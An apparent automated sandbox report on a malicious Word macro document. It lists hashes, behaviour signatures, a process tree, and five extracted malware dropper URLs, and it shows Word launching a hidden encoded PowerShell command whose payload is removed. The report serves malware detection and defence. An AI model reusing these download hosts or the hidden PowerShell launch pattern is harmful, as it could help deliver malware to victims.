Analysis

  • max time kernel: 119s
  • max time network: 121s
  • platform: windows7_x64
  • resource: win7-20241010-en
  • resource tags: arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
  • submitted: 02-12-2024 16:25

General

  • Target: REP_89419812646634117.doc
  • Size: 245KB
  • MD5: 1d6f0e7e30c1d9e3f64b0d36e602da50
  • SHA1: 895d6dd7f677e45e997b03cef761fc40e10b22ba
  • SHA256: 70b4dbed87a8be890a088d70057ce44413bf3a65df5c5c15d049de0b9c47ff8d
  • SHA512: 1d12056c0d91f07372c7575bec45a608ad21f2509331e4a5d8857ad578c6012557842835a21cbf78882f88df2a214faa7f7a10060cb37489e841b1244ca5e226
  • SSDEEP: 6144:H0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+Bzm8tigOE+wH:H0E3dxtR/iU9mvUPBS8tigOE+w

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (exe.dropper):
    • http://amelano.net/wp-includes/css/dist/2ew/
    • http://911concept.com/images/i6ngX5/
    • http://ayonschools.com/UBkoqn/
    • http://beech.org/wayne/lldo/
    • http://firelabo.com/wp-includes/mf6f4/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\REP_89419812646634117.doc"
    PID:2100
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en [encoded command removed]
      PID:2644
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken

Downloads

  • memory/2100-10-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-29-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-0-0x000000002F3D1000-0x000000002F3D2000-memory.dmp (4KB)
  • memory/2100-5-0x00000000002A0000-0x00000000003A0000-memory.dmp (1024KB)
  • memory/2100-6-0x00000000002A0000-0x00000000003A0000-memory.dmp (1024KB)
  • memory/2100-7-0x00000000002A0000-0x00000000003A0000-memory.dmp (1024KB)
  • memory/2100-11-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-12-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-2-0x0000000070C0D000-0x0000000070C18000-memory.dmp (44KB)
  • memory/2100-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/2100-13-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-8-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-15-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-9-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-28-0x0000000005F40000-0x0000000006040000-memory.dmp (1024KB)
  • memory/2100-24-0x0000000070C0D000-0x0000000070C18000-memory.dmp (44KB)
  • memory/2100-27-0x00000000002A0000-0x00000000003A0000-memory.dmp (1024KB)
  • memory/2644-22-0x0000000002010000-0x0000000002018000-memory.dmp (32KB)
  • memory/2644-21-0x000000001B490000-0x000000001B772000-memory.dmp (2.9MB)